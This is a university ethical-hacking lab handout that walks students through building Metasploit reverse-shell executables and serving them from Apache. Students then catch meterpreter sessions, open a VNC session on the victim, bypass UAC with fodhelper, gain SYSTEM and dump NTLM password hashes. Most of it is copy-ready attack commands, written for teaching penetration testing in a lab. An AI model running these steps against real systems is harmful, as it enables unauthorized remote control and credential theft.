Ethical Hacking Lab

Yarmouk University
Faculty of IT
Lab #8

Lab Title: System Hacking -2 : Exploiting Client Side Vulnerabilities and Establishing a VNC Session

Lab objectives:

o Exploiting Client Side Vulnerabilities and Establishing a VNC Session

o Escalating Privileges by Exploiting Client Side Vulnerabilities

Requisites

Windows 10 / 7 machine.

Winrtgn = https://sourceforge.net/projects/rainbowtablesge/

Lab Scenario:

• Virtual Network Computing: is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol
(RFB) to remotely control another computer.

 VNC enables attackers to remotely access and control computers targeted from another computer or mobile
device, wherever they are in the world.
 At the same time, it is also used by network administrators and organizations throughout every industry sector for
a range of different scenarios and use cases, including providing IT desktop support to colleagues and friends, and
accessing systems and services on the move. Here, we will see how attackers can exploit vulnerabilities in target
systems to establish unauthorized VNC sessions and remotely control these targets.
Lab tasks:

Task#1
• Open a terminal window and type
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f
exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe
and press Enter.

 Now create a directory to share this file to victim’s machine, and provide the permissions
and copy the file from Desktop to shared location. To do that , follow the following steps:

Type mkdir /var/www/html/share and press Enter to create a share folder.

Type chmod -R 755 /var/www/html/share and press Enter.
Type chown -R www-data:www-data /var/www/html/share press Enter.
 Now move the malicious file to the shared location by typing
mv /root/Desktop/Test.exe /var/www/html/share and press Enter.

 Start the Apache server by typing service apache2 start and press Enter.
  In the terminal window, type msfconsole and press Enter to start the Metasploit
Framework

Once the metasploit framework starts and you get a msf command line, type the following commands to
set up a listener:
Type use multi/handler and press Enter.
Type set payload windows/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.10 and press Enter.
Type set LPORT 444 and press Enter.
To start the listener, type run and press Enter.

WITH TARGET WINDOWS MACHINE >>>

Open a browser (in this lab we are using Chrome browser) and in the address bar
type http://10.10.10.10/share and press Enter.
As soon as you press Enter, it will display the share folder contents as shown in the screenshot.
Click Test.exe file to download
The Test.exe file gets saved on the Desktop of Windows 10 machine, double-click the executable to
run it.

With Kali Host:::: observe that one session is created or opened in the Meterpreter shell.

in the meterpreter command line type sysinfo and press Enter to get the system information of
the victim machine.

Type run vnc and press Enter to start a VNC session with the victim.
 TightVNC: window appears with the victim Desktop showing in the window.

Task#2
• Once attackers gain access to the target system, they start looking for different ways to
escalate their privilege in the system.
• They can exploit vulnerability, design flaw or configuration oversight in the operating system
or software applications on the target system to gain elevated access to resources that are
normally protected from an application or user.
• The privilege escalation can be vertical or lateral.
This Task demonstrates the exploitation procedure enforced on a weakly patched Windows machine that
allows you to gain access to it through a meterpreter shell; and then employing privilege escalation
techniques to attain administrative privileges to the machine through meterpreter shell.

 Open a terminal window and type :

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e
x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe
and press Enter.
The command creates a Exploit.exe file on the Kali machine's Desktop.

• Type the following commands to create a share folder and change permissions of the
executable:

Type the command mkdir /var/www/html/share and press Enter.

Typing the command chmod -R 755 /var/www/html/share/ and press Enter.
Typing the command chown -R www-data:www-data /var/www/html/share/
and pressing Enter.
Type the command ls -la /var/www/html/ | grep share and press Enter.

Next to start the apache server, type the command service apache2 start in
terminal, and press Enter.
Type the command cp /root/Desktop/Exploit.exe /var/www/html/share/ in the
terminal, and press Enter.
In the terminal window, type msfconsole and press Enter to start the
Metasploit Framework.
Type use exploit/multi/handler and press Enter.

Type set payload windows/meterpreter/reverse_tcp and press Enter.

Type set LHOST 10.10.10.11 and press Enter.

To start the listener, type exploit -j -z

 Now start your Windows Machine ( Target )

 Open a browser (in this lab we are using Chrome browser) and
 in the address bar type http://10.10.10.11/share and press Enter.
 As soon as you press Enter, it will display the share folder contents as shown in the screenshot. Click
Exploit.exe file to download.
 Run Exploit.exe
  Back to Linux terminal -- metasploit session

observe that one session is created or opened in the Meterpreter shell.

Type sessions -i 1 and press Enter to start interacting with the victim
machine.

 To get the Server username type getuid in the meterpreter command line and press Enter.

 Type run post/windows/gather/smart_hashdump and press Enter. The command fails to

dump the passowrd hashes because of insufficient privileges.

Now, we shall try to escalate the privileges by trying to bypass

the user account control setting which is blocking you from
gaining unrestricted access to the machine.
You will now issue a getsystem command that attempts to elevate the user privileges.
The command issued is getsystem -t 1 which uses the Service - Named Pipe Impersonation (In
Memory/Admin) Technique.
This command also fails to escalate the privileges as shown in the screenshot.

Type set SESSION 1 (1 is the current meterpreter session which was back grounded in this lab) and
press Enter.
Now that we have configured the exploit, our next step will be to set a payload and configure it.
Type set payload windows/meterpreter/reverse_tcp and press Enter to set the
meterpreter/reverse_tcp payload.
The next step is to configure this payload. To know all the options, you need to configure in the exploit,
type show options and press Enter.

Type background and press Enter to background the meterpreter session.

Type use exploit/windows/local/bypassuac_fodhelper and press Enter. Then type show
options and press Enter to show the customizable options for the module.

To set the LHOST option, type set LHOST 10.10.10.11 and press Enter.
To set the TARGET option, type set TARGET 0 and press Enter. Then type
exploit

 Check the current User ID status of meterpreter by issuing the getuid command.

 Type getsystem and press Enter. Type getuid and press Enter. The meterpreter session is
now running with SYSTEM privileges (NT AUTHORITY\SYSTEM)
Now try to dump the password hashes by typing the command
run post/windows/gather/smart_hashdump and press Enter. This time, meterpreter
successfully extracted the NTLM hashes and displayed them in the terminal window.

Here is Password hash ,,,, can you recover the plaintext ???